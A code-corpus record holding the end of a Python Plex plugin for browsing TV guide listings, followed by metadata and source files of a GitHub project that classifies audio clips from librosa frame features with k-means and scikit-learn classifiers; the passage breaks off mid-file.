return\n    \n####################################################################################################\n\ndef inProgressMenu(sender):\n    dir = MediaContainer()\n    dir.Append(Function(DirectoryItem(setInProgress, title=L('Show'))))\n    dir.Append(Function(DirectoryItem(setInProgress, title=L('Hide'))))\n    return dir\n\ndef setInProgress(sender):\n    if sender.itemTitle == L('Show'):\n        setPref('inProgress', True)\n    else:\n        setPref('inProgress', False)\n    return\n    \n####################################################################################################\n\ndef collapseShowsMenu(sender):\n    dir = MediaContainer()\n    dir.Append(Function(DirectoryItem(setCollapse, title=L('Show'))))\n    dir.Append(Function(DirectoryItem(setCollapse, title=L('Hide'))))\n    return dir\n    \ndef setCollapse(sender):\n    if sender.itemTitle == L('Show'):\n        v = False\n    else:\n        v = True\n    setPref('collapseShows', v)\n    \n    return\n\n####################################################################################################\n\ndef hideChannelsMenu(sender):\n    dir = MediaContainer()\n    dir.title2 = L('Hide Channels')\n    dir.nocache = 1\n    if sender == 0: dir.replaceParent = 1\n    channels = getPref('channels')\n    channelList = channels.keys()\n    channelList.sort()\n    for channel in channelList:\n        if channels[channel]['enabled']:\n            dir.Append(Function(DirectoryItem(hideChannel, title=str(channel) + ' ' + channels[channel]['name'])))\n    return dir\n    \ndef hideChannel(sender):\n    (num, name) = sender.itemTitle.split(' ', 1) # split once: channel names may contain spaces\n    channels = getPref('channels')\n    channels[int(num)]['enabled'] = False\n    setPref('channels', channels)\n    return hideChannelsMenu(0)\n\n####################################################################################################\n\ndef showChannelsMenu(sender):\n    dir = MediaContainer()\n    dir.title2 = L('Show Channels')\n    dir.nocache = 1\n    channels = getPref('channels')\n    channelList = channels.keys()\n    channelList.sort()\n    for channel 
in channelList:\n if not channels[channel]['enabled']:\n dir.Append(Function(DirectoryItem(showChannel, title=str(channel) + ' ' + channels[channel]['name'])))\n return dir\n \ndef showChannel(sender):\n (num, name) = sender.itemTitle.split(' ')\n channels = getPref('channels')\n channels[int(num)]['enabled'] = True\n setPref('channels', channels)\n return\n\n####################################################################################################\n\ndef AddFavouritesMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Add Favourites')\n dir.nocache = 1\n favourites = getPref('favourites') \n try:\n if len(AddFavouritesMenu.allShows) != 0:\n for show in AddFavouritesMenu.allShows:\n if not show in favourites:\n dir.Append(Function(DirectoryItem(addFavourite, title=show)))\n return dir \n except AttributeError:\n AddFavouritesMenu.allShows = list()\n slots = Dict.Get('shows')\n #showNames = list()\n \n for slot in slots.itervalues():\n for listing in slot:\n name = listing['title']\n if not name in AddFavouritesMenu.allShows and not name in favourites:\n AddFavouritesMenu.allShows.append(name)\n AddFavouritesMenu.allShows.sort()\n for showName in AddFavouritesMenu.allShows:\n dir.Append(Function(DirectoryItem(addFavourite, title=showName)))\n return dir\n \ndef addFavourite(sender):\n favourites = getPref('favourites')\n favourites.append(sender.itemTitle)\n setPref('favourites', favourites)\n return\n\n####################################################################################################\n \ndef RemoveFavouritesMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Remove Favourites')\n dir.nocache = 1\n favourites = getPref('favourites')\n favourites.sort()\n for favourite in favourites:\n dir.Append(Function(DirectoryItem(removeFavourite, title=favourite)))\n return dir\n\ndef removeFavourite(sender):\n favourites = getPref('favourites')\n favourites.remove(sender.itemTitle)\n setPref('favourites', favourites)\n return\n \n####################################################################################################\n\ndef grabListings(t, shows):\n '''Reads group of guide listings\n @param t: start time\n @param shows: currently known listings'''\n url = PROVIDER_INDEX + '&zipcode=' + getPref('postalCode') + '&lineupId=' + getPref('provider') + '&fromTimeInMillis=' + str(t) + '000'\n for td in GetXML(url, True).xpath('//td[starts-with(@class,\"zc-pg\")]'):\n try: showName = td.xpath('child::a')[0].text.encode('ascii','ignore')\n except: showName = ''\n try: description = td.xpath('child::p')[0].text.encode('ascii','ignore')\n except: description = ''\n \n if (showName != '' or description != ''):\n try:\n channel = td.xpath('parent::*')[0].xpath('child::td[@class=\"zc-st\"]')[0]\n channelNum = channel.xpath('descendant::span[@class=\"zc-st-n\"]')[0].text\n channelName = channel.xpath('descendant::span[@class=\"zc-st-c\"]')[0].text\n isValidChannel = True\n except:\n Log('Get channel failed:' + showName + ' ' + description)\n isValidChannel = False\n \n if isValidChannel:\n try:\n releaseYear = td.xpath('child::span[@class=\"zc-pg-y\"]')[0].text\n showName = showName + ' ' + releaseYear\n except: pass\n try:\n episodeName = td.xpath('child::span[@class=\"zc-pg-e\"]')[0].text\n description = episodeName + '\\n\\n' + description\n except: pass\n \n startTime = int(re.search(r'(?:([^,]+),)*', td.get('onclick')).group(1)) // 1000\n startSlot = startTime - (startTime % 1800)\n duration = int(re.search(r'(\\d+)\\)', td.get('onclick')).group(1)) * 60 # 
minutes->seconds\n endTime = startTime + duration\n endSlot = endTime - (endTime % 1800)\n \n if not startSlot in shows: shows[startSlot] = list()\n shows[startSlot].append(dict(title=showName, channelNum=channelNum, channelName=channelName, start=startTime, end=endTime, summary=description, inProgress=False))\n for slot in range(startSlot + 1800, endSlot, 1800):\n if not slot in shows: shows[slot] = list()\n shows[slot].append(dict(title=showName, channelNum=channelNum, channelName=channelName, start=startTime, end=endTime, summary=description, inProgress=True))\n\n####################################################################################################\n\ndef TVMenu(pathNouns, path):\n dir = MediaContainer()\n dir.viewGroup = 'Details'\n menuTime = int(pathNouns[0])\n dir.title2 = timeToDisplay(menuTime)\n dir.nocache = 1\n \n listings = Dict.Get('shows')\n if not menuTime in listings:\n grabListings(menuTime, listings)\n listings = listings[menuTime]\n \n collapse = getPref('collapseShows')\n if collapse:\n keyDict = dict()\n \n displayInProgress = getPref('inProgress')\n channels = getPref('channels')\n favourites = getPref('favourites')\n hits = list()\n misses = list()\n for listing in listings:\n timeString = timeToDisplay(listing['start']) + ' - ' + timeToDisplay(listing['end'])\n if (displayInProgress or not listing['inProgress']) and channels[int(listing['channelNum'])]['enabled']:\n # check if we should collapse it\n listingKey = (frozenset([listing['title'], listing['summary'], listing['start'], listing['end']]))\n if not collapse or listingKey not in keyDict:\n keyDict[listingKey] = '' \n newItem = Function(DirectoryItem(noMenu, title=listing['title'], subtitle=listing['channelNum'] + ' ' + listing['channelName'] + ' ' + timeString, summary=listing['summary']))\n if listing['title'] in favourites:\n hits.append(newItem)\n else:\n misses.append(newItem)\n \n for hit in hits:\n dir.Append(hit)\n for miss in misses:\n dir.Append(miss)\n\n return dir\n \n####################################################################################################\n\ndef daysMenu(sender):\n dir = MediaContainer()\n dir.title2 = L('Days')\n Plugin.AddPathRequestHandler(DAY_PREFIX, dayMenu, '', '', '')\n\n (year, month, day) = datetime.datetime.today().timetuple()[0:3]\n dayOfWeek = calendar.weekday(year, month, day)\n \n midnight = datetime.datetime.fromordinal(datetime.datetime.now().toordinal())\n midnight = calendar.timegm(midnight.timetuple())\n if time.daylight != 0:\n midnight = midnight + time.altzone \n else:\n midnight = midnight + time.timezone\n\n\n for dayCount in range(7):\n dir.Append(DirectoryItem(DAY_PREFIX + '/' + str(midnight), title=calendar.day_name[dayOfWeek]))\n dayOfWeek = (dayOfWeek + 1) % 7\n midnight = midnight + DAY\n\n return dir\n\ndef dayMenu(pathNouns, path):\n dir = MediaContainer() \n Plugin.AddPathRequestHandler(PLUGIN_PREFIX, TVMenu, '', '', '')\n \n nextTime = int(pathNouns[0])\n for k in range(48):\n dir.Append(DirectoryItem(PLUGIN_PREFIX + '/' + str(nextTime), timeToDisplay(nextTime), '',''))\n nextTime = nextTime + 1800\n return dir\n\n####################################################################################################\n\ndef noMenu(sender):\n pass\n\n####################################################################################################\n\ndef GetXML(theUrl, use_html_parser=False):\n return XML.ElementFromString(HTTP.Request(url=theUrl, cacheTime=CACHE_TIME), 
use_html_parser)\n\n####################################################################################################\n\ndef setPref(id, value):\n Prefs.Set(id, pickle.dumps(value))\n\ndef getPref(id):\n return pickle.loads(Prefs.Get(id))\n \ndef addPref(id, kind, default, name):\n Prefs.Add(id, kind, pickle.dumps(default), name)\n \n####################################################################################################\n"
}
] | 2 |
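The plugin file above ends with setPref/getPref helpers that pickle arbitrary Python values into the framework's string-only preference store. A minimal, self-contained sketch of that pattern (Python 3; `Store` is a stand-in for the plugin framework's `Prefs` object, not the real API):

import pickle

class Store:
    """Stand-in for a string-only key/value store like Prefs.Get/Prefs.Set."""
    def __init__(self):
        self._data = {}
    def Set(self, key, value):
        self._data[key] = value
    def Get(self, key):
        return self._data[key]

Prefs = Store()

def setPref(key, value):
    # Serialize any picklable value (dict, list, bool) for the string store.
    Prefs.Set(key, pickle.dumps(value))

def getPref(key):
    return pickle.loads(Prefs.Get(key))

setPref('channels', {7: {'name': 'News 24', 'enabled': True}})
assert getPref('channels')[7]['enabled'] is True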
SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach
|
https://github.com/SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach
|
c05b7f2afba6fbc670be32a690df43786cfad785
|
c4973f76188d44a3a9f77073c50d009cb21653b9
|
5dceb6c469890544e429426a18137afacf439702
|
refs/heads/master
| 2021-01-11T16:01:26.779881 | 2017-01-16T10:08:51 | 2017-01-16T10:08:51 | 79,984,678 | 1 | 0 | null | 2017-01-25T05:04:22 | 2017-01-25T05:03:08 | 2017-01-16T10:08:51 | null |
[
{
"alpha_fraction": 0.6641891598701477,
"alphanum_fraction": 0.6662161946296692,
"avg_line_length": 23.128204345703125,
"blob_id": "ae61960c4f8fdcb11b87c71a39645d04c44f276b",
"content_id": "925ecde7d0de813924cdcdca9403a7349159df20",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2960,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 117,
"path": "/src/retrieve_audio_features.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\r\nimport librosa\r\n\r\nimport numpy as np\r\n\r\nimport os\r\nimport shutil\r\nimport sys\r\n\r\nsourceFolder = \"Data\"\r\n\r\n\r\ndef get_features(y,sr):\r\n\tn_fft = sys.argv[1]\r\n\r\n\tif n_fft.isdigit() == False:\r\n\t\t\"Window length has to be an integer\"\r\n\t\tsys.exit()\r\n\r\n\tn_fft = int(n_fft)\t\r\n\thop_length =n_fft/4\r\n\r\n\tfeatures = None\r\n\r\n\t#MFCCS\r\n\tmfccs = librosa.feature.mfcc(y=y, sr=sr, n_mfcc = 60 , n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = mfccs\r\n\r\n\t#Delta mfccs\r\n\tdelta_mfccs = librosa.feature.delta(mfccs)\r\n\tfeatures = np.concatenate((features,delta_mfccs))\r\n\r\n\r\n\t#rmse\r\n\trmse = librosa.feature.rmse(y=y , n_fft = n_fft , hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,rmse))\r\n\r\n\r\n\t#spectral centroid\r\n\tspectral_centroid = librosa.feature.spectral_centroid(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_centroid))\r\n\r\n\r\n\t#spectral badwidth\r\n\tspectral_bandwidth = librosa.feature.spectral_bandwidth(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_bandwidth))\r\n\r\n\r\n\t#spectral contrast\r\n\tspectral_contrast = librosa.feature.spectral_contrast(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_contrast))\r\n\r\n\r\n\t#spectral rolloff\r\n\tspectral_rolloff = librosa.feature.spectral_rolloff(y=y, sr=sr, n_fft = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,spectral_rolloff))\r\n\r\n\r\n\r\n\t#zero crossing rate\r\n\tzero_crossing_rate = librosa.feature.zero_crossing_rate(y=y, frame_length = n_fft, hop_length = hop_length)\r\n\tfeatures = np.concatenate((features,zero_crossing_rate))\r\n\r\n\r\n\treturn np.transpose(features)\r\n\r\n\r\n\r\n\r\nif os.path.exists(sourceFolder):\r\n\r\n\tsourceFolderFullPath = os.path.abspath(sourceFolder)\r\n\r\n\tif os.path.exists(\"Temp\"):\r\n\t\tshutil.rmtree(\"Temp\")\r\n\t\r\n\tos.makedirs(\"Temp\")\r\n\r\n\r\n\r\n\tdirs = os.listdir(sourceFolderFullPath)\r\n\r\n\tif dirs != []:\r\n\r\n\t\tfor dir in dirs:\r\n\t\t\ttry:\r\n\t\t\t\tlabel = int(dir)\r\n\t\t\texcept:\r\n\t\t\t\t\"The labels given to the categories should be numerical.\"\r\n\t\t\t\tsys.exit()\r\n\r\n\t\t\taudioTrainPath = \"{}/{}/train\".format(sourceFolderFullPath,dir)\r\n\t\t\taudioTestPath = \"{}/{}/test\".format(sourceFolderFullPath,dir)\r\n\r\n\t\t\tprint \"Retrieving audio features of category {}\".format(label)\r\n\t\t\t\r\n\t\t\tfor subdir in [audioTrainPath,audioTestPath]:\r\n\r\n\t\t\t\tcsvSubdir = subdir.replace(\"Data\",\"Temp\\\\csv\")\r\n\t\t\t\tos.makedirs(csvSubdir)\r\n\t\t\t\r\n\t\t\t\tfor file in os.listdir(subdir):\r\n\t\t\t\t\tif \"ogg\" in file or \"wav\" in file:\r\n\t\t\t\t\t\tsoundFileFullPath = os.path.join(subdir,file)\r\n\t\t\t\t\t\tfeaturesFile = file.replace(\".ogg\",\"\")\r\n\t\t\t\t\t\ty,sr = librosa.load(soundFileFullPath)\r\n\t\t\t\t\t\tfeatures = get_features(y,sr)\r\n\r\n\r\n\t\t\t\t\t\tfeaturesFileFullPath = os.path.join(csvSubdir,\"{}.csv\".format(featuresFile))\r\n\t\t\t\t\t\tnp.savetxt(featuresFileFullPath,features,fmt='%1.3f',delimiter=\",\")\r\n\r\n\r\n\telse:\r\n\t\t\"The Data directory is empty\"\r\n\r\nelse:\r\n\tprint \"The Data path doesn't exist\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
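A condensed sketch of the per-frame feature stack that retrieve_audio_features.py builds, written for Python 3 and a current librosa (note: `librosa.feature.rmse` from the librosa 0.4.3 this repo targets is named `rms` in recent releases, so the exact calls are an assumption). Frames become rows, features columns:

import librosa
import numpy as np

def frame_features(y, sr, n_fft=1024):          # 1024 is an illustrative window
    hop_length = n_fft // 4                     # same 75 % overlap as the script
    mfccs = librosa.feature.mfcc(y=y, sr=sr, n_mfcc=60,
                                 n_fft=n_fft, hop_length=hop_length)
    stack = [
        mfccs,
        librosa.feature.delta(mfccs),           # delta-MFCCs
        librosa.feature.rms(y=y, frame_length=n_fft, hop_length=hop_length),
        librosa.feature.zero_crossing_rate(y=y, frame_length=n_fft,
                                           hop_length=hop_length),
    ]
    return np.concatenate(stack).T              # shape: (n_frames, n_features)

y, sr = librosa.load(librosa.ex('trumpet'))     # bundled demo clip (downloads once)
print(frame_features(y, sr).shape)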
{
"alpha_fraction": 0.7026647925376892,
"alphanum_fraction": 0.7082749009132385,
"avg_line_length": 23.802326202392578,
"blob_id": "5e8a37c3da29c3f2da0fa1419a393927d52f5120",
"content_id": "09fd36c0a504ae696250967cf661c25f4e823d10",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2139,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 86,
"path": "/src/generate_training_test_data.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\nimport os\nimport numpy as np \n\nprint \"\\n Generating Training and Test Data\"\n\nsourceFolder = \"Temp//csv\"\nsourceFolderFullPath = os.path.abspath(sourceFolder)\n\n\ndirs = os.listdir(sourceFolderFullPath)\n\n\n#getting training data\nfeatures = None\nlabels = None\nfor dir in dirs:\n\tlabel = int(dir)\n\n\tfeaturesTrainPath = \"{}/{}/train\".format(sourceFolderFullPath,dir)\n\n\tfor file in os.listdir(featuresTrainPath):\n\t\tif \"csv\" in file :\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTrainPath,file)\n\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\n\n\t\t\t#remove rows with nan values \n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\n\n\t\t\ttemp_labels = [label]*temp_features.shape[0]\n\t\t\ttemp_labels = np.expand_dims(temp_labels,axis = 1)\n\n\n\t\t\tif features is None:\n\t\t\t\tfeatures = temp_features\n\t\t\t\tlabels = temp_labels\n\t\t\telse:\n\t\t\t\tfeatures = np.concatenate((features,temp_features))\n\t\t\t\tlabels = np.concatenate((labels,temp_labels))\n\n\nprint \"Total Training Frames : {}\".format(features.shape[0])\n\n\nnp.savetxt(\"Temp\\\\features_train.csv\",features,fmt='%1.3f',delimiter=\",\")\nnp.savetxt(\"Temp\\\\labels_train.csv\",labels,delimiter = \",\")\n\n\n\n#getting test data\nfeatures = None\nlabels = None\nfor dir in dirs:\n\tlabel = int(dir)\n\n\tfeaturesTestPath = \"{}/{}/test\".format(sourceFolderFullPath,dir)\n\n\tfor file in os.listdir(featuresTestPath):\n\t\tif \"csv\" in file :\n\t\t\tfeaturesFileFullPath = os.path.join(featuresTestPath,file)\n\n\t\t\ttemp_features = np.loadtxt(featuresFileFullPath,delimiter = \",\")\n\n\t\t\t#remove rows with nan values \n\t\t\ttemp_features = temp_features[~np.isnan(temp_features).any(axis=1)]\n\n\t\t\ttemp_labels = [label]*temp_features.shape[0]\n\t\t\ttemp_labels = np.expand_dims(temp_labels,axis = 1)\n\n\n\t\t\tif features is None:\n\t\t\t\tfeatures = temp_features\n\t\t\t\tlabels = temp_labels\n\t\t\telse:\n\t\t\t\tfeatures = np.concatenate((features,temp_features))\n\t\t\t\tlabels = np.concatenate((labels,temp_labels))\n\n\n\n\nnp.savetxt(\"Temp\\\\features_test.csv\",features,fmt='%1.3f',delimiter=\",\")\nnp.savetxt(\"Temp\\\\labels_test.csv\",labels,delimiter = \",\")\n\nprint \"Total Test Frames : {}\".format(features.shape[0])\n\nprint \"Features Generated\"\n\n\n\t\t\t"
},
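Two operations carry generate_training_test_data.py: dropping any frame that contains NaNs, then pairing each surviving frame with its category label. In runnable miniature:

import numpy as np

frames = np.array([[1.0, 2.0],
                   [np.nan, 3.0],   # this frame is discarded
                   [4.0, 5.0]])
label = 7

clean = frames[~np.isnan(frames).any(axis=1)]   # keep only all-finite rows
labels = np.full((clean.shape[0], 1), label)    # one label per surviving frame

print(clean.shape, labels.ravel())              # (2, 2) [7 7]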
{
"alpha_fraction": 0.6956181526184082,
"alphanum_fraction": 0.7018779516220093,
"avg_line_length": 24.5,
"blob_id": "a93ffd831e0a892766562436db9186743895db05",
"content_id": "c1874fa1d58558c57a2d0b3f022eef1dfaff0a78",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1278,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 48,
"path": "/src/train.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "\r\nimport sys \r\nimport subprocess\r\n\r\n\r\nif len(sys.argv) != 3:\r\n\tprint \"\\nArguements not valid\\npython train.py window_length clusters \"\r\n\tsys.exit()\r\n\r\nwindow_length = sys.argv[1]\r\n\r\nif window_length.isdigit() == False:\r\n\t\"Window length has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\n#Retrieving features from the audio files.\r\ncommand_run = subprocess.call(\"python retrieve_audio_features.py {}\".format(window_length))\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n#Generating the training and test data set\r\ncommand_run = subprocess.call(\"python generate_training_test_data.py\")\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n\r\n#normalizing the training dataset\r\ncommand_run = subprocess.call(\"python normalizer.py\")\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n# no of clusters for kmenas clustering \r\nclusters = sys.argv[2]\r\n\r\nif clusters.isdigit() == False:\r\n\t\"No of clusters has to be an integer\"\r\n\tsys.exit()\r\n\r\n\r\n# running kmeans clustering algo on the normalized data\r\ncommand_run = subprocess.call(\"python kmeans_train.py {}\".format(clusters))\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n# derived features after taking the bag of frames for each of the audio file.\r\ncommand_run = subprocess.call(\"python generate_derived_training_test_data.py {}\".format(clusters))\r\nif command_run != 0:\r\n\tsys.exit()\r\n\r\n\r\n"
},
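train.py chains the pipeline stages with subprocess.call and manual exit-code checks. A modern-Python sketch of the same orchestration, where subprocess.run(check=True) raises instead of the script's repeated `if command_run != 0: sys.exit()` guards (the "1024" window and "50" clusters below are illustrative arguments, not values fixed by the repo):

import subprocess
import sys

stages = [
    [sys.executable, "retrieve_audio_features.py", "1024"],
    [sys.executable, "generate_training_test_data.py"],
    [sys.executable, "normalizer.py"],
    [sys.executable, "kmeans_train.py", "50"],
]

for cmd in stages:
    try:
        subprocess.run(cmd, check=True)         # raises on nonzero exit
    except subprocess.CalledProcessError as err:
        sys.exit(f"stage failed: {' '.join(cmd)} (exit {err.returncode})")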
{
"alpha_fraction": 0.7202572226524353,
"alphanum_fraction": 0.7202572226524353,
"avg_line_length": 22.8799991607666,
"blob_id": "aa09db1ed5ec700ade2cde4cca302ae9a79867f2",
"content_id": "9a6453667d984483cbfc2d5f7f914fe018b06056",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 622,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 25,
"path": "/src/normalizer.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "import numpy as np\r\nimport os \r\n\r\nprint \"\\n Normalizing training data for kmeans clustering...\"\r\n\r\nDATA_SOURCE = \"Temp\\\\features_train.csv\"\r\nNORMALIZER_FILENAME = \"kmeans_normalizer.p\"\r\n\r\nif os.path.exists(DATA_SOURCE):\r\n\tfeatures = np.loadtxt(DATA_SOURCE,delimiter = \",\")\r\n\r\n\tfrom sklearn.preprocessing import MinMaxScaler\r\n\tnormalizer = MinMaxScaler()\r\n\tnormalizer.fit(features)\r\n\r\n\r\n\r\n\timport pickle\r\n\twith open(\"Temp\\\\{}\".format(NORMALIZER_FILENAME),\"wb\") as outfile:\r\n\t\tpickle.dump(normalizer,outfile)\r\n\t\r\n\tprint \"kmeans normalizer saved\"\r\n\r\nelse:\r\n\tprint \"No file features_train.csv, Generate the features first.\"\r\n"
},
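normalizer.py's contract in miniature: fit MinMaxScaler on the training frames only, persist it with pickle, and reload it later so test frames are scaled with the *training* minima/maxima rather than their own (the file path below is illustrative):

import pickle
import numpy as np
from sklearn.preprocessing import MinMaxScaler

train = np.array([[0.0, 10.0], [2.0, 30.0]])
scaler = MinMaxScaler().fit(train)              # learns per-column min/max

with open("kmeans_normalizer.p", "wb") as fh:
    pickle.dump(scaler, fh)

with open("kmeans_normalizer.p", "rb") as fh:
    reloaded = pickle.load(fh)

print(reloaded.transform(np.array([[1.0, 20.0]])))   # [[0.5 0.5]]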
{
"alpha_fraction": 0.69532310962677,
"alphanum_fraction": 0.7032796144485474,
"avg_line_length": 35.16245651245117,
"blob_id": "8ae6850bd6418ff7eabdd739e4a4b668791e5590",
"content_id": "6b9ed9cafeb4af25428f337e4a8fcc52209d647a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10306,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 277,
"path": "/src/test.py",
"repo_name": "SamwiseGambgee/Audio-classification-using-Bag-of-Frames-approach",
"src_encoding": "UTF-8",
"text": "#test\r\nfrom time import time\r\ndef svm_predict(training_samples, training_labels, test_samples, test_lables, kernel = \"rbf\" , C = 1.0):\r\n\tfrom sklearn.svm import SVC\r\n\r\n\tclf = SVC(kernel = kernel, C =C)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(test_lables,pred)\r\n\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"SVM\"))\r\n\t\toutfile.write(\"kernel = {}\\n\".format(kernel))\r\n\t\toutfile.write(\"C = {}\\n\".format(C))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\t\r\ndef naive_bayes_predict(training_samples, training_labels, test_samples, test_lables):\r\n\tfrom sklearn.naive_bayes import GaussianNB\r\n\r\n\tclf = GaussianNB()\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Naive Bayes\"))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\n\r\ndef decision_tree_predict(training_samples, training_labels, test_samples, test_lables, criterion = \"gini\", min_samples_split = 2):\r\n\tfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n\tclf = DecisionTreeClassifier(criterion = criterion,min_samples_split = min_samples_split)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith 
open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"Decision Tree\"))\r\n\t\toutfile.write(\"criterion = {}\\n\".format(criterion))\r\n\t\toutfile.write(\"min_samples_split = {}\\n\".format(min_samples_split))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : {}\\n\".format(test_time))\r\n\t\toutfile.write(\"Accuracy : {}\\n\".format(acc))\r\n\r\n\twith open(\"Temp\\\\result_labels.csv\",\"wb\") as outfile:\r\n\t\tnp.savetxt(outfile,pred)\r\n\r\n\r\ndef knn_predict(training_samples, training_labels, test_samples, test_lables,k_neighbours = 5,weights = \"uniform\",algorithm = \"auto\"):\r\n\tfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\n\tclf = KNeighborsClassifier(n_neighbors = k_neighbours, weights =weights, algorithm = algorithm)\r\n\r\n\tt0 = time()\r\n\tclf.fit(training_samples,training_labels)\r\n\ttraining_time = round(time()-t0, 3)\r\n\r\n\tt0 = time()\r\n\tpred = clf.predict(test_samples)\r\n\ttest_time = round(time()-t0, 3)\r\n\r\n\tfrom sklearn.metrics import accuracy_score\r\n\r\n\tacc = accuracy_score(pred,test_lables)\r\n\r\n\tno_features = np.array(training_samples).shape[1]\r\n\ttraining_samples = np.array(training_samples).shape[0]\r\n\ttest_samples = np.array(test_samples).shape[0]\r\n\r\n\twith open(\"Temp\\\\results.txt\",\"w\") as outfile:\r\n\t\toutfile.write(\"Alogirthm : {}\\n\".format(\"KNN\"))\r\n\t\toutfile.write(\"K = {}\\n\".format(k_neighbours))\r\n\t\toutfile.write(\"weight = {}\\n\".format(weights))\r\n\t\toutfile.write(\"algorithm = {}\\n\".format(algorithm))\r\n\t\toutfile.write(\"No of features : {}\\n\".format(no_features))\r\n\t\toutfile.write(\"No of training samples : {}\\n\".format(training_samples))\r\n\t\toutfile.write(\"No of test samples : {}\\n\".format(test_samples))\r\n\t\toutfile.write(\"Training time : {}\\n\".format(training_time))\r\n\t\toutfile.write(\"Test time : 